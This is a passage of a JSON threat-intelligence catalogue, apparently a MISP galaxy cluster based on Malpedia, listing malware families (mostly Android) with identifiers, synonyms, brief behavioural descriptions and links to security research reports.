{ "authors": [ "Davide Arcuri", "Alexandre Dulaunoy", "Steffen Enders", "Andrea Garavaglia", "Andras Iklody", "Daniel Plohmann", "Christophe Vandeplas" ], "category": "tool", "description": "Malware galaxy cluster based on Malpedia.", "name": "Malpedia", "source": "Malpedia", "type": "malpedia", "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", "https://github.com/fboldewin/FastCashMalwareDissected/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", "https://www.us-cert.gov/ncas/alerts/TA18-275A", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.youtube.com/watch?v=zGvQPtejX9w" ], "synonyms": [], "type": [] }, "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02", "value": "FastCash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/" ], "synonyms": [ "AxeSpy" ], "type": [] }, "uuid": "5c7a35bf-e5f1-4b07-b93a-c3608cc9142e", "value": "ActionSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot", "https://twitter.com/LukasStefanko/status/1243198756981559296" ], "synonyms": [], "type": [] }, "uuid": "d95708e9-220a-428c-b126-a63986099892", "value": "AdoBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" ], "synonyms": [], "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", "value": "AdultSwine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth", "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/", "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", "https://www.secrss.com/articles/24995", "https://securelist.com/transparent-tribe-part-2/98233/" ], "synonyms": [], "type": [] }, "uuid": "86a5bb47-ac59-449a-8ff2-ae46e19cc6d2", "value": "AhMyth" }, { "description": "According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/" ], "synonyms": [], "type": [] }, "uuid": "de483b10-4247-46b3-8ab5-77d089f0145c", "value": "Alien" }, { "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", "https://github.com/DesignativeDave/androrat", "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", "value": "AndroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb", "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", "https://www.youtube.com/watch?v=U0UsfO-0uJM", "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", "https://community.riskiq.com/article/85b3db8c", "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://pentest.blog/n-ways-to-unpack-mobile-malware/", "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html" ], "synonyms": [ "BankBot", "android.bankbot", "android.bankspy" ], "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", "value": "Anubis (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" ], "synonyms": [], "type": [] }, "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", "value": "AnubisSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub", "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [], "type": [] }, "uuid": "dffa06ec-e94f-4fd7-8578-2a98aace5473", "value": "Asacub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas", "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" ], "synonyms": [], "type": [] }, "uuid": "aabcfbb6-6385-486d-a30b-e3a2edcf493d", "value": "Ashas" }, { "description": "According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018.\r\nIT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank", "https://twitter.com/LukasStefanko/status/1268070798293708800" ], "synonyms": [], "type": [] }, "uuid": "231f9f49-6752-49af-9ee0-7774578fcbe4", "value": "ATANK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall", "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a" ], "synonyms": [], "type": [] }, "uuid": "5eec00de-5d81-4907-817d-f99cb33d9b66", "value": "BADCALL (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch", "https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/" ], "synonyms": [ "WelcomeChat" ], "type": [] }, "uuid": "9b96e274-1602-48a4-8e0d-9f756d4e835b", "value": "BadPatch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke", "https://twitter.com/LukasStefanko/status/1280243673100402690" ], "synonyms": [], "type": [] }, "uuid": "c59b65d6-d363-4b19-b082-d72508e782c0", "value": "Basbanke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian", "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html", "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html" ], "synonyms": [], "type": [] }, "uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc", "value": "BianLian" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.blackrock", "https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html" ], "synonyms": [], "type": [] }, "uuid": "2f3f82f6-ec21-489e-8257-0967c567798a", "value": "BlackRock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata", "https://securelist.com/spying-android-rat-from-brazil-brata/92775/" ], "synonyms": [], "type": [] }, "uuid": "d9ff080d-cde0-48da-89db-53435c99446b", "value": "BRATA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper", "https://securelist.com/busygasper-the-unfriendly-spy/87627/" ], "synonyms": [], "type": [] }, "uuid": "4bf68bf8-08e5-46f3-ade5-0bd4f124b168", "value": "BusyGasper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal", "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" ], "synonyms": [], "type": [] }, "uuid": "56090c0b-2b9b-4624-8eff-ef6d3632fd2b", "value": "CarbonSteal" }, { "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" ], "synonyms": [], "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", "value": "Catelites" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus", "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/", "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/", "https://community.riskiq.com/article/85b3db8c", "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/", "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf", "https://github.com/ics-iot-bootcamp/cerberus_research", "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf", "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", "https://twitter.com/AndroidCerberus" ], "synonyms": [], "type": [] }, "uuid": "c3a2448f-bb41-4201-b524-3ddcb02ddbf4", "value": "Cerberus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois", "https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf", "https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/" ], "synonyms": [], "type": [] }, "uuid": "2e230ff8-3971-4168-a966-176316cbdbf2", "value": "Chamois" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html", "https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", "value": "Charger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/", "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf" ], "synonyms": [ "JigglyPuff", "Pegasus" ], "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", "value": "Chrysaor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" ], "synonyms": [], "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", "value": "Clientor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper", "https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html", "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", "https://news.drweb.com/show?lng=en&i=12739" ], "synonyms": [], "type": [] }, "uuid": "ff9b47c6-a5b5-4531-abfc-2e4db3dcdc7e", "value": "Clipper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cloudatlas", "https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware" ], "synonyms": [], "type": [] }, "uuid": "ed780667-b67c-4e17-ab43-db1b7e018e66", "value": "CloudAtlas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot", "https://twitter.com/LukasStefanko/status/1102937833071935491" ], "synonyms": [], "type": [] }, "uuid": "151bf399-aa8f-4160-b9b5-8fe222f2a6b1", "value": "CometBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" ], "synonyms": [ "SpyBanker" ], "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", "value": "Connic" }, { "description": "Poses as an app that can offer a \"corona safety mask\" but phone's address book and sends sms to contacts, spreading its own download link.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm", "https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html", "https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan" ], "synonyms": [], "type": [] }, "uuid": "f041032e-01af-4e66-9fb2-f8da88a6ea35", "value": "Coronavirus Android Worm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" ], "synonyms": [], "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor", "https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/" ], "synonyms": [ "CryCrypter", "CryDroid" ], "type": [] }, "uuid": "21e9d7e6-6e8c-49e4-8869-6bac249cda8a", "value": "CryCryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades", "https://twitter.com/LukasStefanko/status/1252163657036976129" ], "synonyms": [ "Rogue" ], "type": [] }, "uuid": "97fe35c9-f50c-495f-8736-0ecd95c70192", "value": "Dark Shades" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" ], "synonyms": [ "Defensor Digital" ], "type": [] }, "uuid": "76346e4d-d14e-467b-9409-82b28a4d6cd6", "value": "DEFENSOR ID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" ], "synonyms": [], "type": [] }, "uuid": "89989df2-e8bc-4074-a8a2-130a15d6625f", "value": "Dendroid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy", "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" ], "synonyms": [], "type": [] }, "uuid": "72a25832-4bf4-4505-a77d-8c0fc52dc85d", "value": "dmsSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent", "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" ], "synonyms": [], "type": [] }, "uuid": "73fd1bda-e4aa-4777-a628-07580bc070f4", "value": "DoubleAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" ], "synonyms": [], "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", "value": "DoubleLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack", "https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic" ], "synonyms": [], "type": [] }, "uuid": "8990cec7-ddd8-435e-97d6-5b36778e86fe", "value": "DroidJack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" ], "synonyms": [], "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", "value": "Dvmap" }, { "description": "According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot", "https://twitter.com/ThreatFabric/status/1240664876558823424", "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", "https://www.youtube.com/watch?v=qqwOrLR2rgU" ], "synonyms": [], "type": [] }, "uuid": "5a6fb8cd-d582-4c8c-b7e0-a5b4cf4f248f", "value": "Eventbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" ], "synonyms": [], "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "value": "ExoBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store" ], "synonyms": [], "type": [] }, "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8", "value": "Exodus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" ], "synonyms": [], "type": [] }, "uuid": "dd821edd-901b-4a5e-b35f-35bb811964ab", "value": "FakeSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram", "https://blog.talosintelligence.com/2018/11/persian-stalker.html" ], "synonyms": [ "FakeTGram" ], "type": [] }, "uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0", "value": "FakeGram" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder", "https://www.welivesecurity.com/2019/07/29/android-ransomware-back/" ], "synonyms": [], "type": [] }, "uuid": "09ff3520-b643-44bd-a0de-90c0e75ba12f", "value": "FileCoder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", "https://github.com/linuzifer/FinSpy-Dokumentation", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] }, "uuid": "0bf7acd4-6493-4126-9598-d2ed069e32eb", "value": "FinFisher (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Android)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://twitter.com/LukasStefanko/status/886849558143279104" ], "synonyms": [ "gugi" ], "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", "value": "FlexNet" }, { "description": "PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for it's C&C.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf" ], "synonyms": [], "type": [] }, "uuid": "ef91833f-3334-4955-9218-f106494e9fc0", "value": "FluBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot", "https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html", "https://securelist.com/roaming-mantis-part-v/96250/", "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" ], "synonyms": [], "type": [] }, "uuid": "bc0d37fa-113a-45ba-8a1c-b9d818e31f27", "value": "FunkyBot" }, { "description": "According to Check Point, they uncovered an operation dubbed \"Domestic Kitten\", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball", "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html", "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program", "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/", "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/" ], "synonyms": [], "type": [] }, "uuid": "53282cc8-fefc-47d7-b6a5-a82a05a88f2a", "value": "FurBall" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost", "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/", "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/" ], "synonyms": [], "type": [] }, "uuid": "b9639878-733c-4f30-9a13-4680a7e17415", "value": "Geost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob", "https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/" ], "synonyms": [], "type": [] }, "uuid": "3d1f2591-05fe-42f4-aaf8-ed1428f17605", "value": "Ghimob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" ], "synonyms": [], "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", "value": "GhostCtrl" }, { "description": "Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:\r\n\r\nOverlaying: Dynamic (local overlays obtained from the C2)\r\nSMS harvesting: SMS listing\r\nSMS harvesting: SMS forwarding\r\nContact list collection\r\nApplication listing\r\nOverlaying: Targets list update\r\nSMS: Sending\r\nCalls: Call forwarding\r\nC2 Resilience: Auxiliary C2 list\r\nSelf-protection: Hiding the App icon\r\nSelf-protection: Preventing removal\r\nSelf-protection: Emulation-detection.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp", "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", 